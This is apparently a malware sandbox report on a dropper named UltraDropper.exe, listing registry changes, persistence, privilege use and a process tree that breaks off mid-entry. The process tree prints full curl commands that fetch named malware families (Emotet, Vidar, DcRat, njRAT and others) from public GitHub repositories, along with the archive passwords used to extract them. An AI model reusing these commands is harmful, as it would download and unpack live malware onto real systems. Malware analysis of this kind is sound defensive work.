\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D8B-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.ListViewCtrl\CurVer\ = "COMCTL.ListViewCtrl.1" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D96-9D6A-101B-AFC0-4210102A8DA7}\InprocServer32\ = "c:\\windows\\comctl32.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E944-850A-101B-AFC0-4210102A8DA7}\ = "ITab10" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8556BCD0-E01E-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83603-895E-11D0-B0A6-000000000000}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E82-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867A2-8586-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74190B8-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA664-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}\2.0\FLAGS\ = "2" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74190B8-8589-11D1-B16A-00C0F0283628}\ = "INode" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\ = "IVBDataObjectFiles" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA42-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A4-850A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877890-E026-11CF-8E74-00A0C90F26F8}\ = "IListItems11" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ImageComboCtl\CLSID\ = "{DD9DA666-8594-11D1-B16A-00C0F0283628}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\ToolboxBitmap32\ = "c:\\windows\\comctl32.ocx, 16" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\ToolboxBitmap32\ = "c:\\windows\\comctl32.ocx, 10" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA40-E020-11CF-8E74-00A0C90F26F8}\ = "IButtons" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\MiscStatus regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TabStrip\CurVer\ = "MSComctlLib.TabStrip.2" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{35053A21-8589-11D1-B16A-00C0F0283628} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF953-8592-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\ = "Microsoft TabStrip Control, version 5.0 (SP2)" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A7-850A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 27 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2612 schtasks.exe 1784 schtasks.exe 2340 schtasks.exe 1628 schtasks.exe 4356 schtasks.exe 4572 schtasks.exe 3144 schtasks.exe 1888 schtasks.exe 1380 schtasks.exe 1028 schtasks.exe 660 schtasks.exe 1172 schtasks.exe 4772 schtasks.exe 3792 schtasks.exe 3052 schtasks.exe 2664 schtasks.exe 2088 schtasks.exe 2896 schtasks.exe 4828 schtasks.exe 3964 schtasks.exe 3872 schtasks.exe 1944 schtasks.exe 4768 schtasks.exe 2172 schtasks.exe 4616 schtasks.exe 2380 schtasks.exe 3600 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3948 Install.exe 3948 Install.exe 3388 regsvr32.exe 3388 regsvr32.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3948 Install.exe 3848 regsvr32.exe 3848 regsvr32.exe 3848 regsvr32.exe 3848 regsvr32.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 676 PortwebSaves.exe 3032 powershell.exe 3032 powershell.exe 4768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeRestorePrivilege 4360 ud.7z.exe Token: 35 4360 ud.7z.exe Token: SeSecurityPrivilege 4360 ud.7z.exe Token: SeSecurityPrivilege 4360 ud.7z.exe Token: SeRestorePrivilege 4432 ud.7z.exe Token: 35 4432 ud.7z.exe Token: SeSecurityPrivilege 4432 ud.7z.exe Token: SeSecurityPrivilege 4432 ud.7z.exe Token: SeRestorePrivilege 3716 ud.7z.exe Token: 35 3716 ud.7z.exe Token: SeSecurityPrivilege 3716 ud.7z.exe Token: SeSecurityPrivilege 3716 ud.7z.exe Token: SeRestorePrivilege 1568 ud.7z.exe Token: 35 1568 ud.7z.exe Token: SeSecurityPrivilege 1568 ud.7z.exe Token: SeSecurityPrivilege 1568 ud.7z.exe Token: SeRestorePrivilege 4132 ud.7z.exe Token: 35 4132 ud.7z.exe Token: SeSecurityPrivilege 4132 ud.7z.exe Token: SeSecurityPrivilege 4132 ud.7z.exe Token: SeRestorePrivilege 788 ud.7z.exe Token: 35 788 ud.7z.exe Token: SeSecurityPrivilege 788 ud.7z.exe Token: SeSecurityPrivilege 788 ud.7z.exe Token: SeRestorePrivilege 3200 ud.7z.exe Token: 35 3200 ud.7z.exe Token: SeSecurityPrivilege 3200 ud.7z.exe Token: SeSecurityPrivilege 3200 ud.7z.exe Token: SeRestorePrivilege 4700 ud.7z.exe Token: 35 4700 ud.7z.exe Token: SeSecurityPrivilege 4700 ud.7z.exe Token: SeSecurityPrivilege 4700 ud.7z.exe Token: SeRestorePrivilege 2388 ud.7z.exe Token: 35 2388 ud.7z.exe Token: SeSecurityPrivilege 2388 ud.7z.exe Token: SeSecurityPrivilege 2388 ud.7z.exe Token: SeRestorePrivilege 2308 ud.7z.exe Token: 35 2308 ud.7z.exe Token: SeSecurityPrivilege 2308 ud.7z.exe Token: SeSecurityPrivilege 2308 ud.7z.exe Token: SeRestorePrivilege 1400 ud.7z.exe Token: 35 1400 ud.7z.exe Token: SeSecurityPrivilege 1400 ud.7z.exe Token: SeSecurityPrivilege 1400 ud.7z.exe Token: SeDebugPrivilege 4920 Worm (1).exe Token: SeDebugPrivilege 4764 windows.exe Token: SeDebugPrivilege 676 PortwebSaves.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 3004 cmd.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] 1448 [email protected] -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1448 [email protected] 1448 [email protected] 3248 antivirus-platinum.exe 1616 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1424 wrote to memory of 2588 1424 UltraDropper.exe 78 PID 1424 wrote to memory of 2588 1424 UltraDropper.exe 78 PID 1424 wrote to memory of 2588 1424 UltraDropper.exe 78 PID 2588 wrote to memory of 4548 2588 cmd.exe 79 PID 2588 wrote to memory of 4548 2588 cmd.exe 79 PID 2588 wrote to memory of 4548 2588 cmd.exe 79 PID 2588 wrote to memory of 4360 2588 cmd.exe 80 PID 2588 wrote to memory of 4360 2588 cmd.exe 80 PID 2588 wrote to memory of 4360 2588 cmd.exe 80 PID 1424 wrote to memory of 4868 1424 UltraDropper.exe 81 PID 1424 wrote to memory of 4868 1424 UltraDropper.exe 81 PID 1424 wrote to memory of 4868 1424 UltraDropper.exe 81 PID 4868 wrote to memory of 2360 4868 cmd.exe 82 PID 4868 wrote to memory of 2360 4868 cmd.exe 82 PID 4868 wrote to memory of 2360 4868 cmd.exe 82 PID 4868 wrote to memory of 4432 4868 cmd.exe 83 PID 4868 wrote to memory of 4432 4868 cmd.exe 83 PID 4868 wrote to memory of 4432 4868 cmd.exe 83 PID 1424 wrote to memory of 1068 1424 UltraDropper.exe 84 PID 1424 wrote to memory of 1068 1424 UltraDropper.exe 84 PID 1424 wrote to memory of 1068 1424 UltraDropper.exe 84 PID 1068 wrote to memory of 1108 1068 cmd.exe 85 PID 1068 wrote to memory of 1108 1068 cmd.exe 85 PID 1068 wrote to memory of 1108 1068 cmd.exe 85 PID 1068 wrote to memory of 3716 1068 cmd.exe 86 PID 1068 wrote to memory of 3716 1068 cmd.exe 86 PID 1068 wrote to memory of 3716 1068 cmd.exe 86 PID 1424 wrote to memory of 4824 1424 UltraDropper.exe 87 PID 1424 wrote to memory of 4824 1424 UltraDropper.exe 87 PID 1424 wrote to memory of 4824 1424 UltraDropper.exe 87 PID 4824 wrote to memory of 572 4824 cmd.exe 88 PID 4824 wrote to memory of 572 4824 cmd.exe 88 PID 4824 wrote to memory of 572 4824 cmd.exe 88 PID 4824 wrote to memory of 1568 4824 cmd.exe 89 PID 4824 wrote to memory of 1568 4824 cmd.exe 89 PID 4824 wrote to memory of 1568 4824 cmd.exe 89 PID 1424 wrote to memory of 4048 1424 UltraDropper.exe 90 PID 1424 wrote to memory of 4048 1424 UltraDropper.exe 90 PID 1424 wrote to memory of 4048 1424 UltraDropper.exe 90 PID 4048 wrote to memory of 4572 4048 cmd.exe 91 PID 4048 wrote to memory of 4572 4048 cmd.exe 91 PID 4048 wrote to memory of 4572 4048 cmd.exe 91 PID 4048 wrote to memory of 4132 4048 cmd.exe 92 PID 4048 wrote to memory of 4132 4048 cmd.exe 92 PID 4048 wrote to memory of 4132 4048 cmd.exe 92 PID 1424 wrote to memory of 1444 1424 UltraDropper.exe 93 PID 1424 wrote to memory of 1444 1424 UltraDropper.exe 93 PID 1424 wrote to memory of 1444 1424 UltraDropper.exe 93 PID 1444 wrote to memory of 1396 1444 cmd.exe 94 PID 1444 wrote to memory of 1396 1444 cmd.exe 94 PID 1444 wrote to memory of 1396 1444 cmd.exe 94 PID 1444 wrote to memory of 788 1444 cmd.exe 95 PID 1444 wrote to memory of 788 1444 cmd.exe 95 PID 1444 wrote to memory of 788 1444 cmd.exe 95 PID 1424 wrote to memory of 32 1424 UltraDropper.exe 96 PID 1424 wrote to memory of 32 1424 UltraDropper.exe 96 PID 1424 wrote to memory of 32 1424 UltraDropper.exe 96 PID 32 wrote to memory of 4396 32 cmd.exe 97 PID 32 wrote to memory of 4396 32 cmd.exe 97 PID 32 wrote to memory of 4396 32 cmd.exe 97 PID 32 wrote to memory of 3200 32 cmd.exe 98 PID 32 wrote to memory of 3200 32 cmd.exe 98 PID 32 wrote to memory of 3200 32 cmd.exe 98 PID 1424 wrote to memory of 2980 1424 UltraDropper.exe 99 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" antivirus-platinum.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" antivirus-platinum.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3340 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4548
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2360
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1108
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:572
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4572
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\vidar.zip" "https://github.com/Princekin/malware-database/raw/main/Vidar%20Stealer/vidar%20-%2004.11.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\vidar.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\vidar.zip" "https://github.com/Princekin/malware-database/raw/main/Vidar%20Stealer/vidar%20-%2004.11.2022.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\vidar.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\dc.zip" "https://github.com/Princekin/malware-database/raw/main/DcRat/DcRat%20-%2009.10.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\dc.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\dc.zip" "https://github.com/Princekin/malware-database/raw/main/DcRat/DcRat%20-%2009.10.2022.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2136
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\dc.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\laplas.zip" "https://github.com/Princekin/malware-database/raw/main/Laplas%20Clipper/Laplas%20-%2008.12.2022%20(FUD%203%20of%2071).zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\laplas.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"2⤵
- System Location Discovery: System Language Discovery
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\laplas.zip" "https://github.com/Princekin/malware-database/raw/main/Laplas%20Clipper/Laplas%20-%2008.12.2022%20(FUD%203%20of%2071).zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1692
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\laplas.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\njrat.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/njRAT-v0.6.4/njRAT-v0.6.4.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\njrat.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat"2⤵
- System Location Discovery: System Language Discovery
PID:2352 -
